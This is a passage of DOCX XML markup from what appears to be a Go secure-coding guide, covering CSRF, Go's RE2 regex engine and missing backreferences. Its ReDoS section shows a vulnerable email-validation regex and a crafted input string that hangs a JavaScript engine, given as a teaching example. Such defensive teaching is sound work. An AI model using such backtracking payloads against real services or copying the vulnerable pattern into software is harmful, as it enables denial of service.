      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// This is useful if you're sending JSON to clients or a front-end JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// framework.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
}
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> SubmitSignupForm(w http.ResponseWriter, r *http.Request) {
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// We can trust that requests making it this far have satisfied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// our CSRF protection requirements.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP has a detailed </w:t>
      </w:r>
      <w:hyperlink r:id="rId110" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>, which you're recommended to read.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="99" w:name="Regular_Expressions"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Regular Expressions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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1" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>source</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It is well-known that Regular Expressions are hard to master. Sometimes, what seems to be a simple validation, may lead to a </w:t>
      </w:r>
      <w:hyperlink w:anchor="Regular_Expression_Denial_of_Service__ReDoS_" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Denial-of-Service</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go authors took it seriously, and unlike other programming languages, the decided to implement </w:t>
      </w:r>
      <w:hyperlink r:id="rId112" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>RE2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> for the </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>regex standard package</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="100" w:name="Why_RE2"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Why RE2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 15"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>RE2 was designed and implemented with an explicit goal of being able to handle regular expressions from untrusted users without risk. (</w:t>
      </w:r>
      <w:hyperlink r:id="rId113" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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01" w:name="Regular_Expression_Denial_of_Service__ReDoS_"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Regular Expression Denial of Service (ReDoS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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4" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>source</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>You're better off reading the full article "</w:t>
      </w:r>
      <w:hyperlink r:id="rId114" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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5" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>RegEx for email validation at RegExLib.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">^([a-zA-Z0-9])(([\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If you try to match </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>john.doe@somehost.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> against this regular expression you may feel confident that it does what you're looking for. If you're developing using Go, you'll come up with something like this:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> (
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"fmt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"regexp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
)
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
    testString1 := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"john.doe@somehost.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    testString2 := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    regex := regexp.MustCompile(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
    fmt.Println(regex.MatchString(testString1))
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// expected output: true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    fmt.Println(regex.MatchString(testString2))
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// expected output: false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Which is not a problem:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ go run src/redos.go
true
false
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>However, what if you're developing with, for example, JavaScript?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> testString1 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">'john.doe@somehost.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">;
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> testString2 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">;
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> regex = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text7"/>
        </w:rPr>
        <w:t xml:space="preserve">/^([a-zA-Z0-9])(([\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">;
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">.log(regex.test(testString1));
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// expected output: true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">.log(regex.test(testString2));
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// expected output: hang/FATAL EXCEPTION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>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02" w:name="What_s_missing_"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>What's missing?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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6" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Backreferences</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId117" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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2"/>
        </w:rPr>
        <w:t>.*?</w:t>
      </w:r>
      <w:r>
        <w:t>. But fulling requirement a) is challenging because closing a tag match depends on what was matched as the opening tag. This is exactly what Backreferences allows us to do. See the JavaScript implementation below:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> testString1 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;h1&gt;Go Secure Coding Practices Guide&lt;/h1&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">;
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> testString2 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;p&gt;Go Secure Coding Practices Guide&lt;/p&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">;
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> testString3 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;h1&gt;Go Secure Coding Practices Guid&lt;/p&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">;
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> regex = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text7"/>
        </w:rPr>
        <w:t xml:space="preserve">/&lt;([a-z][a-z0-9]*)\b[^&gt;]*&gt;.*?&lt;\/\1&gt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">;
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">.log(regex.test(testString1));
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// expected output: true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">.log(regex.test(testString2));
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// expected output: true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">.log(regex.test(testString3));
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// expected output: false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>\1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will hold the value previously captured by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>([A-Z][A-Z0-9]*)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>This is something you should not expect to do in Go.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 07"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> (
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"fmt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"regexp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
)
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
    testString1 := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;h1&gt;Go Secure Coding Practices Guide&lt;/h1&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    testString2 := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;p&gt;Go Secure Coding Practices Guide&lt;/p&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    testString3 := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;h1&gt;Go Secure Coding Practices Guid&lt;/p&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    regex := regexp.MustCompile(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;([a-z][a-z0-9]*)\b[^&gt;]*&gt;.*?&lt;\/\1&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
    fmt.Println(regex.MatchString(testString1))
    fmt.Println(regex.MatchString(testString2))
    fmt.Println(regex.MatchString(testString3))
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Running the Go source code sample above should result in the following errors:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ go run src/backreference.go
# command-line-arguments
src/backreference.go:12:64: unknown escape sequence
src/backreference.go:12:67: non-octal character in escape sequence: &gt;
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>You may feel tempted to fix these errors, coming up with the following regular expression:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;([a-z][a-z0-9]*)\b[^&gt;]*&gt;.*?&lt;\\/\\1&gt;
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Then, this is what you'll get:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">go run src/backreference.go
panic: regexp: Compile("&lt;([a-z][a-z0-9]*)\b[^&gt;]*&gt;.*?&lt;\\/\\1&gt;"): error parsing regexp: invalid escape sequence: `\1`
goroutine 1 [running]:
regexp.MustCompile(0x4de780, 0x21, 0xc00000e1f0)
        /usr/local/go/src/regexp/regexp.go:245 +0x171
main.main()
        /go/src/backreference.go:12 +0x3a
exit status 2
</w:t>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18" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>dlclark/regexp2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>). Keeping that in mind, then you'll (probably) lose RE2's "safety features" such as the linear-time performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="103" w:name="How_to_Contribute"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>How to Contribute</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This project is based on GitHub and can be accessed by </w:t>
      </w:r>
      <w:hyperlink r:id="rId119" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>clicking here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Here are the basic of contributing to GitHub:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Fork and clone the project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Set up the project locally</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Create an upstream remote and sync your local copy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Branch each set of work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Push the work to your own repository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Create a new pull request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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0" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> - a free and open source distributed version control system and other tools around Git:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:hyperlink r:id="rId121" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Gogs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> - Go Git Service, a painless self-hosted Git Service, which provides a Github like user interface and workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:hyperlink r:id="rId122" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Git flow</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> - a collection of Git extensions to provide high-level repository operations for </w:t>
      </w:r>
      <w:hyperlink r:id="rId123" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Vincent Driessen's branching model</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
